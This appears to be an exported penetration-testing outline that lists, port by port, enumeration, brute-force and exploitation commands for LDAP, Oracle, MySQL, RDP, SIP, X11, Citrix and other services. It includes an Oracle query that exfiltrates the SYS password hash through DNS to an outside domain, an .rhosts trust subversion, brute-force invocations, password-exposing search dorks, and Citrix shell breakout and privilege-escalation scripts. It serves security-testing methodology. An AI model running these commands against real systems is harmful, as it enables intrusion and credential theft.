
16.14.1.3. ldp

16.14.1.3.1. Gui based tool

16.14.1.4. openldap

16.14.1.4.1. ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]

16.14.1.4.2. ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]

16.14.1.4.3. ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]

16.14.1.4.4. ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]

16.14.1.4.5. ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]

16.14.2. ldap brute force

16.14.2.1. bf_ldap

16.14.2.1.1. bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)

16.14.2.2. K0ldS

16.14.2.3. LDAP_Brute.pl

16.14.3. Examine Configuration Files

16.14.3.1. General

16.14.3.1.1. containers.ldif

16.14.3.1.2. ldap.cfg

16.14.3.1.3. ldap.conf

16.14.3.1.4. ldap.xml

16.14.3.1.5. ldap-config.xml

16.14.3.1.6. ldap-realm.xml

16.14.3.1.7. slapd.conf

16.14.3.2. IBM SecureWay V3 server

16.14.3.2.1. V3.sas.oc

16.14.3.3. Microsoft Active Directory server

16.14.3.3.1. msadClassesAttrs.ldif

16.14.3.4. Netscape Directory Server 4

16.14.3.4.1. nsslapd.sas_at.conf

16.14.3.4.2. nsslapd.sas_oc.conf

16.14.3.5. OpenLDAP directory server

16.14.3.5.1. slapd.sas_at.conf

16.14.3.5.2. slapd.sas_oc.conf

16.14.3.6. Sun ONE Directory Server 5.1

16.14.3.6.1. 75sas.ldif

16.15. PPTP/L2TP/VPN port 500/1723 open

16.15.1. Enumeration

16.15.1.1. ike-scan

16.15.1.2. ike-probe

16.15.2. Brute-Force

16.15.2.1. ike-crack

16.15.3. Reference Material

16.15.3.1. PSK cracking paper

16.15.3.2. SecurityFocus Infocus

16.15.3.3. Scanning a VPN Implementation

16.16. Modbus port 502 open

16.16.1. modscan

16.17. rlogin port 513 open

16.17.1. Rlogin Enumeration

16.17.1.1. Find the files

16.17.1.1.1. find / -name .rhosts

16.17.1.1.2. locate .rhosts

16.17.1.2. Examine Files

16.17.1.2.1. cat .rhosts

16.17.1.3. Manual Login

16.17.1.3.1. rlogin hostname -l username

16.17.1.3.2. rlogin <IP>

16.17.1.4. Subvert the files

16.17.1.4.1. echo ++ > .rhosts

16.17.2. Rlogin Brute force

16.17.2.1. Hydra

16.18. rsh port 514 open

16.18.1. Rsh Enumeration

16.18.1.1. rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command

16.18.2. Rsh Brute Force

16.18.2.1. rsh-grind

16.18.2.2. Hydra

16.18.2.3. medusa

16.19. SQL Server Port 1433 1434 open

16.19.1. SQL Enumeration

16.19.1.1. piggy

16.19.1.2. SQLPing

16.19.1.2.1. sqlping ip_address/hostname

16.19.1.3. SQLPing2

16.19.1.4. SQLPing3

16.19.1.5. SQLpoke

16.19.1.6. SQL Recon

16.19.1.7. SQLver

16.19.2. SQL Brute Force

16.19.2.1. SQLPAT

16.19.2.1.1. sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack

16.19.2.1.2. sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack

16.19.2.2. SQL Dict

16.19.2.3. SQLAT

16.19.2.4. Hydra

16.19.2.5. SQLlhf

16.19.2.6. ForceSQL

16.20. Citrix port 1494 open

16.20.1. Citrix Enumeration

16.20.1.1. Default Domain

16.20.1.2. Published Applications

16.20.1.2.1. ./citrix-pa-scan {IP_address/file | - | random} [timeout]

16.20.1.2.2. citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]

16.20.2. Citrix Brute Force

16.20.2.1. bforce.js

16.20.2.2. connect.js

16.20.2.3. Citrix Brute-forcer

16.20.2.4. Reference Material

16.20.2.4.1. Hacking Citrix - the legitimate backdoor

16.20.2.4.2. Hacking Citrix - the forceful way

16.21. Oracle Port 1521 Open

16.21.1. Oracle Enumeration

16.21.1.1. oracsec

16.21.1.2. Repscan

16.21.1.3. Sidguess

16.21.1.4. Scuba

16.21.1.5. DNS/HTTP Enumeration

16.21.1.5.1. SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL

16.21.1.5.2. Untitled

16.21.1.6. WinSID

16.21.1.7. Oracle default password list

16.21.1.8. TNSVer

16.21.1.8.1. tnsver host [port]

16.21.1.9. TCP Scan

16.21.1.10. Oracle TNSLSNR

16.21.1.10.1. Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]

16.21.1.11. TNSCmd

16.21.1.11.1. perl tnscmd.pl -h ip_address

16.21.1.11.2. perl tnscmd.pl version -h ip_address

16.21.1.11.3. perl tnscmd.pl status -h ip_address

16.21.1.11.4. perl tnscmd.pl -h ip_address --cmdsize (40 - 200)

16.21.1.12. LSNrCheck

16.21.1.13. Oracle Security Check (needs credentials)

16.21.1.14. OAT

16.21.1.14.1. sh opwg.sh -s ip_address

16.21.1.14.2. opwg.bat -s ip_address

16.21.1.14.3. sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID

16.21.1.15. OScanner

16.21.1.15.1. sh oscanner.sh -s ip_address

16.21.1.15.2. oscanner.exe -s ip_address

16.21.1.15.3. sh reportviewer.sh oscanner_saved_file.xml

16.21.1.15.4. reportviewer.exe oscanner_saved_file.xml

16.21.1.16. NGS Squirrel for Oracle

16.21.1.17. Service Register

16.21.1.17.1. Service-register.exe ip_address

16.21.1.18. PLSQL Scanner 2008

16.21.2. Oracle Brute Force

16.21.2.1. OAK

16.21.2.1.1. ora-getsid hostname port sid_dictionary_list

16.21.2.1.2. ora-auth-alter-session host port sid username password sql

16.21.2.1.3. ora-brutesid host port start

16.21.2.1.4. ora-pwdbrute host port sid username password-file

16.21.2.1.5. ora-userenum host port sid userlistfile

16.21.2.1.6. ora-ver -e (-f -l -a) host port

16.21.2.2. breakable (Targets Application Server Port)

16.21.2.2.1. breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose

16.21.2.3. SQLInjector (Targets Application Server Port)

16.21.2.3.1. sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL

16.21.2.3.2. sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle

16.21.2.4. Check Password

16.21.2.5. orabf

16.21.2.5.1. orabf [hash]:[username] [options]

16.21.2.6. thc-orakel

16.21.2.6.1. Cracker

16.21.2.6.2. Client

16.21.2.6.3. Crypto

16.21.2.7. DBVisualisor

16.21.2.7.1. Sql scripts from pentest.co.uk

16.21.2.7.2. Manual sql input of previously reported vulnerabilties

16.21.3. Oracle Reference Material

16.21.3.1. Understanding SQL Injection

16.21.3.2. SQL Injection walkthrough

16.21.3.3. SQL Injection by example

16.21.3.4. Advanced SQL Injection in Oracle databases

16.21.3.5. Blind SQL Injection

16.21.3.6. SQL Cheatsheets

16.21.3.6.1. Untitled

16.22. NFS Port 2049 open

16.22.1. NFS Enumeration

16.22.1.1. showmount -e hostname/ip_address

16.22.1.2. mount -t nfs ip_address:/directory_found_exported /local_mount_point

16.22.2. NFS Brute Force

16.22.2.1. Interact with NFS share and try to add/delete

16.22.2.2. Exploit and Confuse Unix

16.22.3. Examine Configuration Files

16.22.3.1. /etc/exports

16.22.3.2. /etc/lib/nfs/xtab

16.22.4. nmap nse script

16.22.4.1. nfs-showmount

16.23. Compaq/HP Insight Manager Port 2301,2381open

16.23.1. HP Enumeration

16.23.1.1. Authentication Method

16.23.1.1.1. Host OS Authentication

16.23.1.1.2. Default Authentication

16.23.1.2. Wikto

16.23.1.3. Nstealth

16.23.2. HP Bruteforce

16.23.2.1. Hydra

16.23.2.2. Acunetix

16.23.3. Examine Configuration Files

16.23.3.1. path.properties

16.23.3.2. mx.log

16.23.3.3. CLIClientConfig.cfg

16.23.3.4. database.props

16.23.3.5. pg_hba.conf

16.23.3.6. jboss-service.xml

16.23.3.7. .namazurc

16.24. MySQL port 3306 open

16.24.1. Enumeration

16.24.1.1. nmap -A -n -p3306 <IP Address>

16.24.1.2. nmap -A -n -PN --script:ALL -p3306 <IP Address>

16.24.1.3. telnet IP_Address 3306

16.24.1.4. use test; select * from test;

16.24.1.5. To check for other DB's -- show databases

16.24.2. Administration

16.24.2.1. MySQL Network Scanner

16.24.2.2. MySQL GUI Tools

16.24.2.3. mysqlshow

16.24.2.4. mysqlbinlog

16.24.3. Manual Checks

16.24.3.1. Default usernames and passwords

16.24.3.1.1. username: root password:

16.24.3.1.2. testing

16.24.3.2. Configuration Files

16.24.3.2.1. Operating System

16.24.3.2.2. Command History

16.24.3.2.3. Log Files

16.24.3.2.4. To run many sql commands at once -- mysql -u username -p < manycommands.sql

16.24.3.2.5. MySQL data directory (Location specified in my.cnf)

16.24.3.2.6. SSL Check

16.24.3.3. Privilege Escalation

16.24.3.3.1. Current Level of access

16.24.3.3.2. Access passwords

16.24.3.3.3. Create a new user and grant him privileges

16.24.3.3.4. Break into a shell

16.24.4. SQL injection

16.24.4.1. mysql-miner.pl

16.24.4.1.1. mysql-miner.pl http://target/ expected_string database

16.24.4.2. http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html

16.24.4.3. http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

16.24.5. References.

16.24.5.1. Design Weaknesses

16.24.5.1.1. MySQL running as root

16.24.5.1.2. Exposed publicly on Internet

16.24.5.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql

16.24.5.3. http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0

16.25. RDesktop port 3389 open

16.25.1. Rdesktop Enumeration

16.25.1.1. Remote Desktop Connection

16.25.2. Rdestop Bruteforce

16.25.2.1. TSGrinder

16.25.2.1.1. tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address

16.25.2.2. Tscrack

16.26. Sybase Port 5000+ open

16.26.1. Sybase Enumeration

16.26.1.1. sybase-version ip_address from NGS

16.26.2. Sybase Vulnerability Assessment

16.26.2.1. Use DBVisualiser

16.26.2.1.1. Sybase Security checksheet

16.26.2.1.2. Manual sql input of previously reported vulnerabilties

16.26.2.2. NGS Squirrel for Sybase

16.27. SIP Port 5060 open

16.27.1. SIP Enumeration

16.27.1.1. netcat

16.27.1.1.1. nc IP_Address Port

16.27.1.2. sipflanker

16.27.1.2.1. python sipflanker.py 192.168.1-254

16.27.1.3. Sipscan

16.27.1.4. smap

16.27.1.4.1. smap IP_Address/Subnet_Mask

16.27.1.4.2. smap -o IP_Address/Subnet_Mask

16.27.1.4.3. smap -l IP_Address

16.27.2. SIP Packet Crafting etc.

16.27.2.1. sipsak

16.27.2.1.1. Tracing paths: - sipsak -T -s sip:usernaem@domain

16.27.2.1.2. Options request:- sipsak -vv -s sip:username@domain

16.27.2.1.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain

16.27.2.2. siprogue

16.27.3. SIP Vulnerability Scanning/ Brute Force

16.27.3.1. tftp bruteforcer

16.27.3.1.1. Default dictionary file

16.27.3.1.2. ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes

16.27.3.2. VoIPaudit

16.27.3.3. SiVuS

16.27.4. Examine Configuration Files

16.27.4.1. SIPDefault.cnf

16.27.4.2. asterisk.conf

16.27.4.3. sip.conf

16.27.4.4. phone.conf

16.27.4.5. sip_notify.conf

16.27.4.6. <Ethernet address>.cfg

16.27.4.7. 000000000000.cfg

16.27.4.8. phone1.cfg

16.27.4.9. sip.cfg etc. etc.

16.28. VNC port 5900^ open

16.28.1. VNC Enumeration

16.28.1.1. Scans

16.28.1.1.1. 5900^ for direct access.5800 for HTTP access.

16.28.2. VNC Brute Force

16.28.2.1. Password Attacks

16.28.2.1.1. Remote

16.28.2.1.2. Local

16.28.3. Exmine Configuration Files

16.28.3.1. .vnc

16.28.3.2. /etc/vnc/config

16.28.3.3. $HOME/.vnc/config

16.28.3.4. /etc/sysconfig/vncservers

16.28.3.5. /etc/vnc.conf

16.29. X11 port 6000^ open

16.29.1. X11 Enumeration

16.29.1.1. List open windows

16.29.1.2. Authentication Method

16.29.1.2.1. Xauth

16.29.1.2.2. Xhost

16.29.2. X11 Exploitation

16.29.2.1. xwd

16.29.2.1.1. xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm

16.29.2.2. Keystrokes

16.29.2.2.1. Received

16.29.2.2.2. Transmitted

16.29.2.3. Screenshots

16.29.2.4. xhost +

16.29.3. Examine Configuration Files

16.29.3.1. /etc/Xn.hosts

16.29.3.2. /usr/lib/X11/xdm

16.29.3.2.1. Untitled

16.29.3.3. /usr/lib/X11/xdm/xsession

16.29.3.4. /usr/lib/X11/xdm/xsession-remote

16.29.3.5. /usr/lib/X11/xdm/xsession.0

16.29.3.6. /usr/lib/X11/xdm/xdm-config

16.29.3.6.1. DisplayManager*authorize:on

16.30. Tor Port 9001, 9030 open

16.30.1. Tor Node Checker

16.30.1.1. Ip Pages

16.30.1.2. Kewlio.net

16.30.2. nmap NSE script

16.31. Jet Direct 9100 open

16.31.1. hijetta

17. Final Report - template

18. Nouveau sujet

19. Nouveau sujet

20. Citrix Specific Testing

20.1. Citrix provides remote access services to multiple users across a wide range of platforms. The following information I have put together which will hopefully help you conduct a vulnerability assessment/ penetration test against Citrix

20.2. Enumeration

20.2.1. web search

20.2.1.1. Google (GHDB)

20.2.1.1.1. ext:ica

20.2.1.1.2. inurl:citrix/metaframexp/default/login.asp

20.2.1.1.3. [WFClient] Password= filetype:ica

20.2.1.1.4. inurl:citrix/metaframexp/default/login.asp? ClientDetection=On

20.2.1.1.5. inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"

20.2.1.1.6. inurl:/Citrix/Nfuse17/

20.2.1.1.7. inurl:Citrix/MetaFrame/default/default.aspx

20.2.1.2. Google Hacks (Author Discovered)

20.2.1.2.1. filetype:ica Username=

20.2.1.2.2. inurl:Citrix/AccessPlatform/auth/login.aspx

20.2.1.2.3. inurl:/Citrix/AccessPlatform/

20.2.1.2.4. inurl:LogonAgent/Login.asp

20.2.1.2.5. inurl:/CITRIX/NFUSE/default/login.asp

20.2.1.2.6. inurl:/Citrix/NFuse161/login.asp

20.2.1.2.7. inurl:/Citrix/NFuse16

20.2.1.2.8. inurl:/Citrix/NFuse151/

20.2.1.2.9. allintitle:MetaFrame XP Login

20.2.1.2.10. allintitle:MetaFrame Presentation Server Login

20.2.1.2.11. inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On

20.2.1.2.12. allintitle:Citrix(R) NFuse(TM) Classic Login

20.2.1.3. Yahoo

20.2.1.3.1. originurlextension:ica

20.2.2. site search

20.2.2.1. Manual

20.2.2.1.1. review web page for useful information

20.2.2.1.2. review source for web page

20.2.3. generic

20.2.3.1. nmap -A -PN -p 80,443,1494 ip_address

20.2.3.2. amap -bqv ip_address port_no.

20.2.4. citrix specific

20.2.4.1. enum.pl

20.2.4.1.1. perl enum.pl ip_address

20.2.4.2. enum.js

20.2.4.2.1. enum.js apps TCPBrowserAdress=ip_address

20.2.4.3. connect.js

20.2.4.3.1. connect.js TCPBrowserAdress=ip_address Application=advertised-application

20.2.4.4. Citrix-pa-scan

20.2.4.4.1. perl pa-scan.pl ip_address [timeout] > pas.wri

20.2.4.5. pabrute.c

20.2.4.5.1. ./pabrute pubapp list app_list ip_address

20.2.5. Default Ports

20.2.5.1. TCP

20.2.5.1.1. Citrix XML Service

20.2.5.1.2. Advanced Management Console

20.2.5.1.3. Citrix SSL Relay

20.2.5.1.4. ICA sessions

20.2.5.1.5. Server to server

20.2.5.1.6. Management Console to server

20.2.5.1.7. Session Reliability (Auto-reconnect)

20.2.5.1.8. License Management Console

20.2.5.1.9. License server

20.2.5.2. UDP

20.2.5.2.1. Clients to ICA browser service

20.2.5.2.2. Server-to-server

20.2.6. nmap nse scripts

20.2.6.1. citrix-enum-apps

20.2.6.1.1. nmap -sU --script=citrix-enum-apps -p 1604 <host>

20.2.6.2. citrix-enum-apps-xml

20.2.6.2.1. nmap --script=citrix-enum-apps-xml -p 80,443 <host>

20.2.6.3. citrix-enum-servers

20.2.6.3.1. nmap -sU --script=citrix-enum-servers -p 1604

20.2.6.4. citrix-enum-servers-xml

20.2.6.4.1. nmap --script=citrix-enum-servers-xml -p 80,443 <host>

20.2.6.5. citrix-brute-xml

20.2.6.5.1. nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>

20.3. Scanning

20.3.1. Nessus

20.3.1.1. Plugins

20.3.1.1.1. CGI abuses

20.3.1.1.2. CGI abuses : Cross Site Scripting (XSS)

20.3.1.1.3. Misc.

20.3.1.1.4. Service Detection

20.3.1.1.5. Web Servers

20.3.1.1.6. Windows

20.3.2. Nikto

20.3.2.1. perl nikto.pl -host ip_address -port port_no.

20.3.2.1.1. Untitled

20.4. Exploitation

20.4.1. Alter default .ica files

20.4.1.1. InitialProgram=cmd.exe

20.4.1.2. InitialProgram=c:\windows\system32\cmd.exe

20.4.1.3. InitialProgram=explorer.exe

20.4.2. Enumerate and Connect

20.4.2.1. For applications identified by Citrix-pa-scan

20.4.2.1.1. Pas

20.4.2.2. For published applications with a Citrix client when the master browser is non-public.

20.4.2.2.1. Citrix-pa-proxy

20.4.3. Manual Testing

20.4.3.1. Create Batch File (cmd.bat)

20.4.3.1.1. 1

20.4.3.1.2. 2

20.4.3.2. Host Scripting File (cmd.vbs)

20.4.3.2.1. Option Explicit

20.4.3.2.2. Dim objShell

20.4.3.2.3. Set objShell = CreateObject("WScript.Shell")

20.4.3.2.4. objShell.Run "%comspec% /k"

20.4.3.2.5. WScript.Quit

20.4.3.2.6. alternative functionality

20.4.3.3. iKat

20.4.3.3.1. Integrated Kiosk Attack Tool

20.4.3.4. AT Command - priviledge escalation

20.4.3.4.1. AT HH:MM /interactive "cmd.exe"

20.4.3.4.2. AT HH:MM /interactive %comspec% /k

20.4.3.4.3. Untitled

20.4.3.5. Keyboard Shortcuts/ Hotkeys

20.4.3.5.1. Ctrl + h – View History

20.4.3.5.2. Ctrl + n – New Browser

20.4.3.5.3. Shift + Left Click – New Browser

20.4.3.5.4. Ctrl + o – Internet Address (browse feature)

20.4.3.5.5. Ctrl + p – Print (to file)

20.4.3.5.6. Right Click (Shift + F10)

20.4.3.5.7. F1 – Jump to URL

20.4.3.5.8. SHIFT+F1: Local Task List

20.4.3.5.9. SHIFT+F2: Toggle Title Bar

20.4.3.5.10. SHIFT+F3: Close Remote Application

20.4.3.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del

20.4.3.5.12. CTRL+F2: Remote Task List

20.4.3.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC

20.4.3.5.14. ALT+F2: Cycle through programs

20.4.3.5.15. ALT+PLUS: Alt+TAB

20.4.3.5.16. ALT+MINUS: ALT+SHIFT+TAB

20.5. Brute Force

20.5.1. bforce.js

20.5.1.1. bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2

20.5.1.2. bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt

20.5.1.3. Untitled

20.6. Review Configuration Files

20.6.1. Application server configuration file

20.6.1.1. appsrv.ini

20.6.1.1.1. Location

20.6.1.1.2. World writeable

20.6.1.1.3. Review other files

20.6.1.1.4. Sample file

20.6.2. Program Neighborhood configuration file

20.6.2.1. pn.ini

20.6.2.1.1. Location

20.6.2.1.2. Review other files

20.6.2.1.3. Sample file

20.6.3. Citrix ICA client configuration file

20.6.3.1. wfclient.ini

20.6.3.1.1. Location

20.6.3.1.2. Sample file

20.7. References

20.7.1. Vulnerabilities

20.7.1.1. Art of Hacking

20.7.1.2. Common Vulnerabilities and Exploits (CVE)

20.7.1.2.1. Untitled

20.7.1.2.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=citrix

20.7.1.3. OSVDB

20.7.1.3.1. http://osvdb.org/search/search?search[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=searchSecunia

20.7.1.4. Secunia

20.7.1.4.1. http://secunia.com/advisories/search/?search=citrix

20.7.1.5. Security-database.com

20.7.1.5.1. http://www.security-database.com/cgi-bin/search-sd.cgi?q=Citrix

20.7.1.6. SecurityFocus

20.7.2. Support

20.7.2.1. Citrix

20.7.2.1.1. Knowledge Base

20.7.2.1.2. Forum

20.7.2.2. Thinworld

20.7.3. Exploits

20.7.3.1. Milw0rm

20.7.3.1.1. http://www.milw0rm.com/search.php

20.7.3.2. Art of Hacking

20.7.3.2.1. Citrix

20.7.4. Tutorials/ Presentations

20.7.4.1. Carnal0wnage

20.7.4.1.1. Carnal0wnage Blog: Citrix Hacking

20.7.4.2. Foundstone

20.7.4.2.1. Got Citrix, Hack IT

20.7.4.3. GNUCitizen

20.7.4.3.1. Hacking CITRIX - the forceful way

20.7.4.3.2. 0day: Hacking secured CITRIX from outside

20.7.4.3.3. CITRIX: Owning the Legitimate Backdoor

20.7.4.3.4. Remote Desktop Command Fixation Attacks

20.7.4.4. Packetstormsecurity

20.7.4.4.1. Hacking Citrix

20.7.4.5. Insomniac Security

20.7.4.5.1. Hacking Citrix

20.7.4.6. Aditya Sood

20.7.4.6.1. Rolling Balls - Can you hack clients

20.7.4.7. BlackHat

20.7.4.7.1. Client Side Security

20.7.5. Tools Resource

20.7.5.1. Zip file containing the majority of tools mentioned in this article into a zip file for easy download/ access